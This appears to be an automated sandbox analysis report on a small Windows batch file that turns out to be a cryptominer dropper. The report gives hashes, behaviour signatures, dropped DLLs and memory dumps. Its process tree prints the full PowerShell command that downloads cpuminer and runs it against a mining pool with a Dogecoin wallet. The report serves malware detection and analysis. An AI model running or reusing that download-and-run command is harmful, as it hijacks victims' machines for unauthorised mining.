b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1798s
max time network
1801s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
04/02/2024, 14:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	236	powershell.exe
4	236	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4228	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4228	cpuminer-sse2.exe
4228	cpuminer-sse2.exe
4228	cpuminer-sse2.exe
4228	cpuminer-sse2.exe
4228	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
236	powershell.exe
236	powershell.exe
236	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	236	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3872 wrote to memory of 236	3872	cmd.exe	72
PID 3872 wrote to memory of 236	3872	cmd.exe	72
PID 236 wrote to memory of 2652	236	powershell.exe	74
PID 236 wrote to memory of 2652	236	powershell.exe	74
PID 2652 wrote to memory of 4228	2652	cmd.exe	75
PID 2652 wrote to memory of 4228	2652	cmd.exe	75

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:236
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4228

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ouzd1r5x.kks.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
683KB

MD5
f1445891de77d432d525e250a30209d8

SHA1
8616c62054cbeadae3b3ac5d5dc0faafa5364f0b

SHA256
56f0b888c9489a69aa9d98c57ffebacf583008f342b9a1e686bbbe568b1d1141

SHA512
aba765599b5ee8b2b142965068d61e57ed52699138f593f09686dee65b683fb6408cb8b003658d91ca0e26a8b2bf43c02989260605483168f4ea0d65dca0cc28

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
641KB

MD5
207caeef8d7ceda3192d072751ae97af

SHA1
354ab307b8a75d2abd6820b43206ffd1667c41ec

SHA256
ef47da20460f5776fa291a793cf8a0621e1de4f028769b8f9d38fa053a8dc3ca

SHA512
3bfafac8c11ec5ebec988d4c2613f3603ec42b1aee1df8bae0262c8b69f9bfcf17a4bb94702acb67cc972b26fb40631a90424b4e3b22ff9024c865f8ccecd52b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
287KB

MD5
ca27e202e7de1ba23508af582bab20c3

SHA1
5228e532e30a31a9980c4110e382211057ec70d0

SHA256
f0ad4397c378aedab7d47ccdaeb3998946ea409c8eb4a4597c74de0c1d449da3

SHA512
a3b78561cc95d19547382b6038af060b6b1b031babcc9ee00fa572e88b28492f717680f44ce8013afa4d1e16f40a10e91e1a25fa91cd6138ab78032c7550a15c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
587KB

MD5
b484ab5e58b33cd1f5337f6a14900f9a

SHA1
24e4851ed585dd96b99a6dd8e815982928b715e8

SHA256
ada07043675df8512d26ea29d463f2e761e5dd6dfffb782ec397685f0f10bb6f

SHA512
922a271f46b6b45aec7b68804dd1c3c0b1a11ed901928b6845ae3ef403de982535adee0da7d76849f0ad67d5a6ecd3187c299de87099a4bf1727b16771710772

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
538KB

MD5
5851c902b3039090bdc93e81a2aa0de3

SHA1
f147ecc8f514a40ea2690f5821fe3b4f0c526954

SHA256
a24590f963d2780b4ac90b89ca5b937a19844f95f5d881fa859193dd0702de30

SHA512
f948965082e6ae4fed71b3e59b148af9530e3d2c0686d386e33179d18490653f00b1d77be99a7e28f1f127048cb700c0b9c7ac0b3dba0eb903595234b77b7c19

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
248KB

MD5
44c9ffeff87a1c562bf4aba34563a874

SHA1
f7c1f6438700b3fd0a3761ad4bc8c1eb6be851b3

SHA256
2c4d7fc5e536c86d50d8c578fc7211d2591b767233cda791f58d238b6aa8786c

SHA512
7626f656f2b70e2caf68df7187671b8bf2b76f932f351a779395118cf8f7a73338153d0f1e6d3de9837b161194ba9d6651d949d474871f0068577b3fea1380af

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
448KB

MD5
19a61444b6e2d01755ede80960bca19c

SHA1
e0c7222784d3e2b3329ec3280648b17fd60ef209

SHA256
13fd488b38f3b75438e9ad0a033df005cd397f3c92f43275714a0a7eb3fb4db8

SHA512
bc02c82bdac19f10f3e3a93d3f507bb7838c9255b7cff5af6e3a7f3b471dae9c45c52728c3c23857b3402dd1702cb51a20f225a4da992c26a997c26d86b6b1d9

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
334KB

MD5
c29189c7cd320ae187ba56696f0807c8

SHA1
8385a2062bbbc73469671dc5d263aeddf05fc929

SHA256
ee0d1875cc8341685eaa5546f8e9053bf1ab260a715974ad1428fa56b220aa7e

SHA512
ab24288ed0c4baf04ebc0cb938267c164125074fabb839d068ef0a2ec017579143c32dec21e886697ff574a821758a8f0261d46bd03256f5bf829fcd8066b2d6

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
86KB

MD5
d5b57719c35f009ea814ee18301c6fa4

SHA1
942ec8cfd8d6d601ec493d466e23f9d6de168a84

SHA256
9710f02b80a6f0806f44175f734b86be4db5f03b654edec466fc02a3778f4d83

SHA512
36143d6b0c6964fafded265b2bb33574b6b5a7dd6de60be056221c4e13f34386b9e068bf7b37421842ab1e373ebd934a181bf53002204192a592435d2c2cce42

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
170KB

MD5
6b887c8fb92615cb018d6ccce5bad8bd

SHA1
85d815c4d57ac93daa66fca239049684813bc7fb

SHA256
1ff10122f0fe70a23ecb2b0aef4b2e3e5b7759e38c3d0c9baa58d662b24b37fc

SHA512
39534d5cb8e001f5f28e2d1571f29b1c0c16d7a997fec57c3f3d81659b71ade1467780c9acfb9caaad7a0becde056d14a7e08526019759e1ba6af6da0e31db71

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
224KB

MD5
f491c2c3e2819e6da671a0c8dce9cfc1

SHA1
5da3bc3a8cc7cc3045a07d3ee5376602f5a3e515

SHA256
46f61a906a5e60179595281d5dbf5009595215f35aa1c73652de4dd8ce42ad51

SHA512
c53de481d914c2fc0b6df2b02a7e60c8dde6988a9f55469026902a0fafefce166d6414c2cff834b29645e48f33fa84742c427542ec4a2e8dddc97cd14da0898e

Download Submit
memory/236-50-0x00000232AE490000-0x00000232AE4A2000-memory.dmp

Filesize
72KB

Download
memory/236-107-0x00007FF9FC2F0000-0x00007FF9FCCDC000-memory.dmp

Filesize
9.9MB

Download
memory/236-63-0x00000232AE470000-0x00000232AE47A000-memory.dmp

Filesize
40KB

Download
memory/236-4-0x00007FF9FC2F0000-0x00007FF9FCCDC000-memory.dmp

Filesize
9.9MB

Download
memory/236-30-0x00000232AE2F0000-0x00000232AE300000-memory.dmp

Filesize
64KB

Download
memory/236-29-0x00007FF9FC2F0000-0x00007FF9FCCDC000-memory.dmp

Filesize
9.9MB

Download
memory/236-25-0x00000232AE2F0000-0x00000232AE300000-memory.dmp

Filesize
64KB

Download
memory/236-10-0x00000232AE4B0000-0x00000232AE526000-memory.dmp

Filesize
472KB

Download
memory/236-7-0x00000232AE2F0000-0x00000232AE300000-memory.dmp

Filesize
64KB

Download
memory/236-5-0x00000232AE300000-0x00000232AE322000-memory.dmp

Filesize
136KB

Download
memory/236-6-0x00000232AE2F0000-0x00000232AE300000-memory.dmp

Filesize
64KB

Download
memory/4228-122-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4228-135-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-120-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-123-0x00000000553E0000-0x0000000055478000-memory.dmp

Filesize
608KB

Download
memory/4228-124-0x0000000001070000-0x0000000002925000-memory.dmp

Filesize
24.7MB

Download
memory/4228-125-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-130-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-121-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4228-140-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-150-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-155-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-165-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-170-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-175-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-180-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download